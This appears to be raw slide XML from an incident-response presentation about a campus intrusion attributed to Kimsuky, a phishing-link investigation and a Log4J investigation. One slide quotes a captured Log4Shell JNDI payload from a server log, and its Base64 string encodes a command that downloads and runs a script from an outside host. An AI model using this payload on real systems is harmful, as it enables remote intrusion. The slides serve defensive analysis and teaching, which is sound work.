              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E37EDB0-DF3C-A54B-BA25-C3F73B564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0"/>
            <a:ext cx="8710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7160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CA0E-F1C9-B84D-8EEE-E5100B8DF9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9C2E7-E651-9642-A430-24B37997BBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE079CA9-11EB-7240-9445-30F7D0A455D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4453217" y="3244334"/>
            <a:ext cx="237566" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A587021C-8458-E542-95C6-88134BF73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9413"/>
            <a:ext cx="9144000" cy="609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0400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4FA4-0A30-744F-B3CE-B5C737B4CB13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who’s behind this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52ECBBB2-EEF0-6148-ABB3-20779E948346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STOLEN PENCIL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VELVET CHOLLIMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kimsuky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>aka </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8CAE7A4-E307-8A45-8DAF-9A79F9C19E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3092116" y="3557379"/>
            <a:ext cx="2009274" cy="2423740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="101600" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STOLEN PENCIL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="101600" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>VELVET CHOLLIMA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="101600" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kimsuky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52C24D2-7C6E-3245-926A-F0548F59A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695" y="3300621"/>
            <a:ext cx="5101390" cy="255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330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5E76-A1D2-BA4C-BC74-5064FCE3256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02C9110-CA38-F742-B03D-F1D39636BAC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A158309-2286-2C4B-B165-C9EB97756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2100"/>
            <a:ext cx="9144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3455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5EBF-2990-1444-BEB1-6618CE509E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>59 systems and a review of 2.5+ months of logs later...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B814D84-536C-FD43-B4C3-E822919EB252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack began with a student’s laptop that was compromised in mid-October.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials stolen from that laptop were then used to access a system on campus in mid-November</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers began to spread across multiple departments mostly undetected from mid-November until they attempted to spread to a system running FireEye on Jan 1st.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Along the way 59 systems compromised, 44 user accounts potentially compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A majority of these compromises were from 12/22 - 12/26 and then again on 1/1 - 1/4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25124990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4D56-7C34-AC7C-8F6C-0435EB3C9013}"/>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69A3076B-E8E2-479E-7103-24CBF9F79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714"/>
            <a:ext cx="9154297" cy="2746289"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228172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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Can you automate this?  Shift to junior staff/interns/MSSP/outsource?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>How?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34957742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9FFB-C517-EEFC-9A56-81DED781E67D}"/>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60090895-C301-B195-910A-6B361C9B12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53627"/>
            <a:ext cx="9144000" cy="3337498"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3777511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E2E2-F50A-4346-B698-9DD7F37AC691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F442F227-015E-A545-BA05-6E886A4B2866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A variety of skill level shows that this was a team (or someone who quickly went from 0 to 60 in their skillset) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically worked outside of normal working hours (higher activity after 5pm and a lot of activity over weekends/holiday)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new C&amp;C infrastructure was setup by the attackers which was not seen in any external threat intel (why traditional network based defenses did not alert)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Our theory is their end goal was to compromise as many systems as possible and then ransomware them.  Thankfully we discovered them first.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281535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E2DC-CC3B-8746-B62B-BBDAF42C289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CD193F-5774-444B-8B9C-06F38AA78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76174"/>
            <a:ext cx="7620000" cy="4248651"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19977141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092D-6DCF-7148-8261-51274604AE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7E89BBD-DC4E-714B-8F25-5C8D0BD743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82" y="66613"/>
            <a:ext cx="8362899" cy="6607502"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17107503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203B-2F7C-0746-B76C-F4E5C330B2E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DAF5AAA6-D5D3-8C44-B76C-14C3B6FF30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 y="847788"/>
            <a:ext cx="9124806" cy="5412781"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2180740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679A-5873-0640-91E1-B238DCE1F2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343787-F338-6940-9CCB-A2C869F7EA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54" y="145335"/>
            <a:ext cx="9074146" cy="6434484"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385927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AB106-3896-854E-927A-30993E6FF6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670A67D-82D0-474A-9CB5-BBBF04576E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4638"/>
            <a:ext cx="9161245" cy="6428944"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28601631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1576-275D-04A0-5D7F-7CD7911495BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Phishing Investigation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C116E86-7A36-C489-B297-94FD7F8E615F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>bit.ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> link included in a phishing message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adding a + to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>bit.ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> URL will show you where it goes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3FFDA9F-8BE4-E6ED-6B52-0FD8F6D27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719" y="2670249"/>
            <a:ext cx="7006281" cy="418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58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21EF-DE9E-5387-A7C0-7F8353ECEDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Phishing Investigation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32C63A64-E304-4F52-62E9-7D5935581157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/url/b09ceaec80a8bf043495b978d8d5db044a31a76600bf8a6626440cfdb4bc3521/detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hxxps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secured.payp.alcom-accountsup.date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ ?S3G3N_P4G3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/ip-address/93.90.200.56/details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.threatcrowd.org/ip.php?ip=93.90.200.56</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930148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396A-3E47-734E-8828-FB2BCBF7389D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4J Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5CC2D4-D5F7-3A14-6486-7BF6A15AB3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>45.137.21.9 - - [11/Dec/2021:02:35:55 +0000] "POST / HTTP/1.1" 301 231 "-" "${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name:    hosted-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>by.rootlayer.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address:  45.137.21.9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/url/5b364e73705fb95065c3821e9bfb9f8675c404f4ae539c2b45d4120ee51266d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318744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Plays are not just for detection, also for managing the process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30072619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166-28E7-FA50-3D02-B3764E7AD788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4J Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
